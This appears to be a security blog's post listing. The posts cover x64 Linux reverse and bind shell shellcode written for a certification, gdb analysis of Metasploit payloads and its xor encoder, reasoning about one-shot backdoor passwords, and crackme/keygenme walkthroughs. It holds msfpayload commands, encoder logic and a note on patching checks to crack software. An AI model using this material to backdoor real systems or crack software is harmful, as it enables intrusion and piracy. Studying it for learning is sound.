So I consulted the man page. It would appear the last 8 bytes of the 16-byte struct are padding that does not need to be cleared, and there may be a way to shrink my own shellcode at this point. I think I would be able to save 1 byte by not pushing and clearing this out.

The rest of the code is pretty standard for a reverse shell.  There's another null-byte when the "/bin/sh" string is put on the stack.

So just by looking at Metasploit's code I found at least two places I can further shrink my own code.


A Look at the linux/x64/shell_bind_tcp Metasploit Payload

After I finished micro optimizing my bind TCP port shellcode, I remembered that Metasploit offers one. The msfpayload generated one which weighs in at 86 bytes and the payload always contains null-bytes, even if your port does not have one.  Even though the version I created already had 81 bytes, I thought there might be something to learn from Metasploit's version.

root@kali:~/# msfpayload linux/x64/shell_bind_tcp RPORT=4444 C
 * linux/x64/shell_bind_tcp - 86 bytes

I threw this into a C file.

unsigned char sc[] =

    (*(void(*)()) sc)();

I compiled it: gcc -m64 -z execstack msfbind.c

I then started up: gdb ./a.out

0x00000000004004ba in main ()
7: /x $rdi = 0x1
6: /x $rsi = 0x7fffffffe428
5: /x $rdx = 0x600880
4: /x $rcx = 0x0
3: /x $rbx = 0x0
2: /x $rax = 0x0
1: x/i $rip
=> 0x4004ba <main+14>:    callq  *%rdx

I discovered they were able to shrink their register fixing and first syscall into 12 bytes, whereas mine was 13.  Here is a high level look at what they did to accomplish this:

push   0x29
pop    rax
cdq
push   0x2
pop    rdi
push   0x1
pop    rsi
syscall

You can compare that with my version, which uses the xor esi, esi and mul esi to clear 3 registers.  Here the same is done with cdq to clear out the pollution, and then qword pushes popped directly into the registers. In a future release of my own shellcode I would make this change.

Next though, we come across one of the first instances of a null-byte. It is part of the struct sockaddr that is used, where the port and address family are specified.

0x000000000060088f in sc ()
7: /x $rdi = 0x7
6: /x $rsi = 0x1
5: /x $rdx = 0x0
4: /x $rcx = 0xffffffffffffffff
3: /x $rbx = 0x0
2: /x $rax = 0x2
1: x/i $rip
=> 0x60088f <sc+15>:    movl   $0x5c110002,(%rsp)

When I was writing my own shellcode, I had to make a sacrifice. I probably could have saved even more bytes if I didn't make the port configurable. However, doing so may be the reason I went about things differently, and zeroed out that area of the struct by pushing a zeroed register twice. Metasploit's approach is definitely fewer bytes, but of course has the null.

The next parts of this shellcode are all pretty standard.  I didn't see too much more I could do in terms of shrinkage, and my own execution was very similar to this payload's.

I did want to point out another area though where the null-byte is used, as the terminator for the "/bin/sh" string. I got around this by first pushing a 0 register on the stack, and then naming the string "//bin/sh" to fill in the extra byte.

(gdb) x/i $rip
=> 0x6008c1 <sc+65>:    movabs $0x68732f6e69622f,%rbx
(gdb) x/3x $rip
0x6008c1 <sc+65>:    0x622fbb48    0x732f6e69    0x48530068
(gdb) .


A Look at the x64/xor Metasploit Encoder

After I finished micro optimizing my reverse TCP shellcode, I remembered that Metasploit offers one. The msfpayload generated one which weighs in at 74 bytes. It would seem better than my 77 byte shellcode, except this comes with a price. The payload always contains null-bytes, even if your IP does not have .0's in it. This means you won't have as much luck exploiting string buffers as a completely null-free version would.

I found that to generate a null-free reverse TCP payload with Metasploit I had to use the encoder, and there only appears to be a single encoder explicitly for x64. The final payload size is 119 bytes.

root@kali:~/.ssh# msfpayload linux/x64/shell_reverse_tcp LHOST= LPORT=4444 R | msfencode -t c -e x64/xor -b '\x00'
[*] x64/xor succeeded with size 119 (iteration=1)

I threw this into a C file.

unsigned char sc[] =

    (*(void(*)()) sc)();

I compiled it: gcc -m64 -z execstack msfencoded.c

I then started up: gdb ./a.out

0x00000000004004ba in main ()
7: /x $rdi = 0x1
6: /x $rsi = 0x7fffffffe428
5: /x $rdx = 0x600880
4: /x $rcx = 0x0
3: /x $rbx = 0x0
2: /x $rax = 0x0
1: x/i $rip
=> 0x4004ba <main+14>:    callq  *%rdx

This is where the call into our shellcode begins. It starts out by setting RCX to 0xa. It then does RIP-relative addressing to load into RAX where it needs to start decoding from.

0x000000000060088a in sc ()
7: /x $rdi = 0x1
6: /x $rsi = 0x7fffffffe428
5: /x $rdx = 0x600880
4: /x $rcx = 0xa
3: /x $rbx = 0x0
2: /x $rax = 0x0
1: x/i $rip
=> 0x60088a <sc+10>:    lea    -0x11(%rip),%rax        # 0x600880 <sc>

Next, 0xa5540b36550a8b64 is moved into RBX. This is xored at [RAX + 0x27].

0x000000000060089b in sc ()
7: /x $rdi = 0x1
6: /x $rsi = 0x7fffffffe428
5: /x $rdx = 0x600880
4: /x $rcx = 0xa
3: /x $rbx = 0xa5540b36550a8b64
2: /x $rax = 0x600880
1: x/i $rip
=> 0x60089b <sc+27>:    xor    %rbx,0x27(%rax)

RAX is then advanced by eight bytes (by subtracting -8, which keeps null bytes out of the instruction) and the loop jumps back to the XOR. Once all ten iterations have finished, execution falls straight through into the decoded payload.

This is clearly a very simple encoder.  Here's what the full code looks like:

    xor rcx, rcx
    sub rcx, 0xfffffffffffffff6          ; rcx = 10 qwords to decode
    lea rax, [rip + 0xffffffffffffffef]  ; rax = start of the stub
    movabs rbx, 0xa5540b36550a8b64       ; xor key

decode:
    xor qword ptr [rax+0x27], rbx
    sub rax, 0xfffffffffffffff8          ; rax += 8
    loop decode

    db 0x...
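
The same loop can be sketched in Python: xor the payload eight bytes at a time with the key. Padding the payload with zero bytes up to a multiple of eight is an assumption of this sketch, since the post does not show what the encoder pads with.

```python
import struct

KEY = 0xA5540B36550A8B64


def xor_qwords(data: bytes, key: int = KEY) -> bytes:
    """XOR data with the key one little-endian qword at a time."""
    padded = data + b"\x00" * (-len(data) % 8)   # assumed zero padding
    out = bytearray()
    for (qword,) in struct.iter_unpack("<Q", padded):
        out += struct.pack("<Q", qword ^ key)
    return bytes(out)


payload = bytes(range(74))          # stand-in for the 74-byte reverse shell
encoded = xor_qwords(payload)
```

A 74-byte payload rounds up to 80 bytes, which is where the loop count of 0xa comes from, and applying the function twice returns the original bytes.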


x64 Linux reverse TCP connect shellcode (75 to 83 bytes, 88 to 96 with password)

A "reverse" TCP shellcode is a payload that once executed connects to a remote socket, and pipes all stdin, stdout, and stderr to a local /bin/sh shell. This allows an attacker to gain a backdoor onto the computer.

Reverse shells are often more effective than bind shells, as incoming ports are frequently blocked by a firewall while outgoing connections are generally allowed.

UPDATE: The latest version is now 75 to 83 bytes, 88 to 96 with password.

The smallest reverse shell that I can find is Metasploit's, coming in at 74 bytes.  However, Metasploit's version contains null bytes, which means it isn't very useful in a lot of exploits. In order to remedy this, you have to encode the payload, making it weigh in at 119 bytes.

My version is 77 bytes, or 85 if the IP address itself contains null bytes (such as the well-known localhost address). What I do is subtract a mask from the IP, and add it back in during the shellcode's execution.  My payload also comes with an optional 4-byte one-shot password, which if used brings it to 90 to 98 bytes.

You can find the code at:

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.

Student ID: SLAE64 - 1360

Sunday, December 14, 2014

x64 Linux bind TCP port shellcode (80 bytes, 95 with password)

A "bind shell" is an open port on a machine that copies stdout and stdin to the socket, and executes a shell. When shellcode can be injected into a vulnerable process, this lets an attacker place a backdoor on the computer.

It's well known that one of the best repositories for shellcode on the web is at shell-storm. At the time of writing, the shortest x64 bind shell is 132 bytes, and password protected is 147 bytes. My shellcode is 81 bytes, and 96 with a password. Though this is pretty significant, I still think my code can be shrunk, and welcome any suggestions.

UPDATE: The most recent version is now 80 bytes, 95 with password.

You can find the code at:

My main strategy for reducing the number of bytes was to figure out which 32-bit instructions can stand in for their 64-bit counterparts without too much consequence, since on x64 writing to a 32-bit register automatically zero-extends the result into the full 64-bit register. The reason for this is that the 64-bit forms often require an additional prefix byte so the processor knows to use 64-bit operands.

I also tried to figure out where I could cut corners when it came to the syscalls. For example, I didn't set the max client backlog setting when I bound the port (leaving it at 0). Intuitively, this means that it shouldn't allow any connections; however, Linux goes back to a default setting which will allow us to get on the box.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.

Student ID: SLAE64 - 1360

Friday, December 12, 2014

Why 4 Bytes for a One-shot Password is Reasonably Secure

I was recently thinking about how much entropy a single-shot password would need to be reasonably secure. I concluded 4 bytes of data is enough, and will explain my reasoning.

I should provide some context and define what a single-shot password is. Consider that we are exploiting a vulnerability in a service on an open port, and can inject shellcode to be run. All outgoing traffic from this machine is being blocked, or perhaps there are other reasons we don't want to send a reverse, outgoing shell. We instead want to bind a shell to a new port on the machine so that we can gain a foothold onto the machine and into the network.

We don't want anyone else who sees the open port to have unauthenticated access to our backdoor. Anyone attempting to connect gets one attempt at the password, and if they fail the listening port will close. Forever. We need to keep our shellcode minimal, so using a long passphrase is not going to fly when we inject our exploit.

I consider 4 bytes of data for a single-shot password in this instance to be "reasonably" secure. Of course "reasonably" is subjective, and I am sure there will be detractors to this statement and I would be interested in hearing their discourse. However, I will explain my own reasoning and back it with some simple mathematics.

Let me first say that a 4 byte password, in most contexts, is incredibly insecure. No matter what hashing mechanism or other protections are applied to it, it can probably be cracked within minutes or seconds. However, in a single-shot context, this type of attack on our password is not possible.

Now let's consider the 4-byte passwords that most people use daily. They're used for everything from bank account PINs to "the last 4 digits of your social security number". Typically these passwords are strictly numerical, which does not provide much entropy at all: each byte is drawn from the set 0 to 9, giving 10 possibilities, combined 4 times.

So in fact, the number of possible values for 4 bytes of numerical data is only 10 * 10 * 10 * 10 = 10,000. An attacker only needs 10,000 tries to enumerate every single possible combination of 4 digits.

For some reason, society still considers these 4 digit numerical PINs as "reasonably" secure, even when they're not single shot. In some cases PINs in an application (such as a bank website) can be vulnerable to guessing attacks, which means they can eventually and easily be cracked.

Now let me cite an example of a one-shot password, used by Google's two-factor authentication. When you log onto your Gmail account, you have the option to have it send a 6-digit PIN to your cell phone, helping to ensure it's actually you logging onto the account.  Well, six digits is 10 * 10 * 10 * 10 * 10 * 10 = 1,000,000.  That's a one in a million shot, which Google has deemed reasonably secure.

Back to our bind shell. Our password is not limited to only numerical characters.

Consider the password Z~r0. This contains 26 possibilities of lower case, 26 possibilities of uppercase, 10 possibilities of digits, and at least 10 possibilities for symbols using a standard keyboard. Seventy-two possibilities per byte. So now our entropy is 72 * 72 * 72 * 72 = 26,873,856.

Someone trying to get into our one-shot shell would need to be pretty lucky, with odds of one in nearly twenty-seven million. That is a considerable leap over the 10,000 we use for PINs and the 1,000,000 Google uses.

We can even go a step further. We don't need to restrict our password to human-readable characters; we can use byte values that do not have a visible character.  Any combination of bytes, including null bytes, would work if we do a direct comparison of 32 bits. So, we open ourselves up to 256 * 256 * 256 * 256 = 4,294,967,296 possibilities. That's four billion with a B.

It's said winning the Powerball lottery is about 1 in 175 million odds (175,223,510). Any attacker would likely be better off trying to figure out a way to crack that than our single-shot bind port.

Thursday, November 27, 2014

RingZer0 Crack Me 1 Walkthrough


This crackme is the 2nd file under the Binaries (Windows/Linux) challenges at It is of course a reverse engineering challenge.

I hope this guide will show some useful techniques to solve this challenge using only simple static analysis without the need to look at the assembly code.

Run the File

We run the file and see the following message box:

When we click OK the dialog closes and the program exits. Obviously there is more to the picture.

Viewing the Resources

During static analysis of the file, we realize it has a binary resource embedded inside of it. The hex begins with 4D 5A, which is the MZ header for PE files. 

As it turns out, the program will drop this binary as a DLL tucked away in an AppData folder. We'll simply dump it to disk using Resource Hacker, saving it as crackme1.dll

Inspecting the DLL

We open the DLL using PEView, or alternatively (and often better) PEStudio. We go to the Export Address Table (EAT) and see it exports a function called DisplayMessage.

Run the Exported Function

So in order to run the function, we just have to issue the following command, which uses the rundll32.exe program included with Windows:

RingZer0 Authenticator Walkthrough


This keygenme is the 11th file under the Binaries (Windows/Linux) challenges at A keygenme is a challenge where you need to reverse engineer a serial checksum algorithm. At the time of writing only one other person has solved this particular challenge.

Launching the Program 

I start by launching the program and seeing what it does, keeping an eye out for strings and certain API calls I will want to investigate once I start debugging.

I know right away two places I can start looking. The first is the location where the “Wrong Authentication code” string is loaded into memory. Backtracing from there, I should be able to find the reasons why the input I gave has failed. The next obvious place would be any calls to Win32 APIs which retrieve text from a textbox. There are at least 3 such functions, each of them exported from user32.dll.


Opening it in a Debugger

I start the program in Immunity Debugger. Going straight after the string would be easy, and luckily finding the Win32 API calls is as well.

Go to View -> Executable Modules, and a list of all loaded DLLs is shown. Right click on C:\WINDOWS\SYSTEM32\USER32.DLL and click View Names. Scroll down to GetWindowTextA, right click and select View Call Tree. I chose the first one, right clicked and selected Follow Command in Disassembler.

We are taken right where we want to be:

From here we see that after the textbox values are grabbed, there is a call instruction to the function at 0x004014A0. If the result of the function is equal to 0 (false), the JE instruction jumps us to the “Wrong Authentication code” fail state. So we know we must get the condition where the call to 0x004014A0 returns true.

If we were only interested in bypassing the authentication, we could easily replace the JE instruction with two NOPs (0x90) by editing the hex of the .exe. This is how pirated software is commonly nulled or cracked. Unfortunately, we have to enter a valid key on the RingZer0Team website to get the flag, so we will have to delve a bit deeper and reverse the key check algorithm.

The “Validate” Function 

When we take a brief look at the function in question, we realize it has the structure of a traditional type of validation function.

    if (!test_condition1) return false;
    if (!test_condition2) return false;
    return true;

The first test is pretty easy:

The pre-defined ASCII string loaded into a register and the REPE CMPS assembly instruction are a give-away if you know what the instruction does. It is a mnemonic for “Repeat while Equal, CoMPare Strings”. The JNZ jump is taken if the strings are not equal, and acts as a goto to a fail state (return 0) of the function. Here is the equivalent C code for the above assembly:

    if (strcmp(username, "RingZer0") != 0)
        return false;

The next test is also another commonly seen pattern when dealing with strings:

This snippet uses the REPNE SCAS instruction. This mnemonic means “Repeat while Not Equal, SCAn String”. It is defined to loop over the string until a character equals the value in the eax register, decrementing ecx for each iteration; the string length is then derived from how far ecx has counted down. Here is a C equivalent:

    if (strlen(password) != 16)
        return false;

Intel’s x86 assembly is full of shortcuts like this, where a single instruction can perform the work of many instructions, as long as the right data is placed in the right registers. This one was still a little hard to follow though, and is either the result of obfuscation techniques or an optimization by the compiler.

Next we come to a more interesting test: 

This, like the previous snippet, has a bit of obfuscation to it. However, it simply iterates over the characters and makes sure the first 16 (0x0 to 0xF) are between the ASCII codes 0x30 and 0x39, that is, the digits 0 through 9.

    for (int i = 0; i < 16; ++i)
        if (password[i] > 0x39 || password[i] < 0x30)
            return false;

The “Checksum” Functions 

Next we come to a section of the code where two functions are called:

I investigated both of these functions in IDA Pro and after some time poring over them deduced the following prototypes:

    char* username_checksum(const char* username);
    char* authcode_checksum(const char* password);

The username_checksum() function returns 16 characters, while authcode_checksum() only returns 5. After these functions are called, some of the values in the two results are compared. More information on that in a second though.

I put a breakpoint on the return value of the username_checksum() function, then tested to see if changing the password had any effect on it (which would be possible if a global variable was modified somewhere else in the code). It did not change, and since I already knew the username had to equal to “RingZer0” from the first validation test, I decided not to focus any more attention on this function.

I set about reversing the authcode_checksum() function.

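I was able to reconstruct the following C code:

    char* authcode_checksum(const char* key)    /* key is the password */
    {
        static char buf[6] = { '\0' };

        /* each output byte is built from three consecutive digits */
        for (int i = 0; i < 5; ++i)
            buf[i] = (96 - key[i * 3 + 1]) +
                     (-70 * (key[i * 3] - 48)) +
                     (13 * (key[i * 3 + 2] - 48));

        return buf;
    }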

Now we can look at how the two checksums are compared, which is the last test of the “validate” function.

The equivalent C code paints a more obvious picture:

    if (    auth_check[0] == user_check[1] &&
            auth_check[1] == user_check[5] &&
            auth_check[2] == user_check[8] &&
            auth_check[3] == user_check[14]   )
                return true;

This is the return true we need to pass the “validate” function. I looked at the memory to find that the characters being compared in the user_check string were 0x98, 0x97, 0x78, 0x0f, and 0x15. This meant I needed to find an input for authcode_checksum() where it would return a string with those bytes in it.

Inverting the Checksum Algorithm

I opened up Qt Creator, in my opinion the best free C++ IDE, and wrote an inverse function for authcode_checksum(). It takes in the key values compared from the username checksum in order to generate the appropriate crack. This is a simple brute force since entropy was not very high.

When I ran the inverse checksum program, I got the following output:

Which I entered on the RingZer0Team website:

Thanks to @ekse0x for creating this fun challenge.

Wednesday, September 3, 2014

Seagate Backup Plus vs. Western Digital My Passport Benchmarks

I was recently shopping around for a couple of external hard drives. I ultimately came down to a decision between the Seagate Backup Plus and Western Digital My Passport. I ended up buying both so I could compare them for future reference.

The Seagate has faster reads, and the Western Digital has faster writes. For overall performance the Western Digital drive wins hands-down, but be warned that it is a heavy brick compared to the slimmer Seagate. The following benchmarks were performed on Ubuntu Linux 15.04 with the gnome-disks utility, straight out of the boxes.

WD My Passport Benchmark

Seagate Backup Plus Slim Benchmark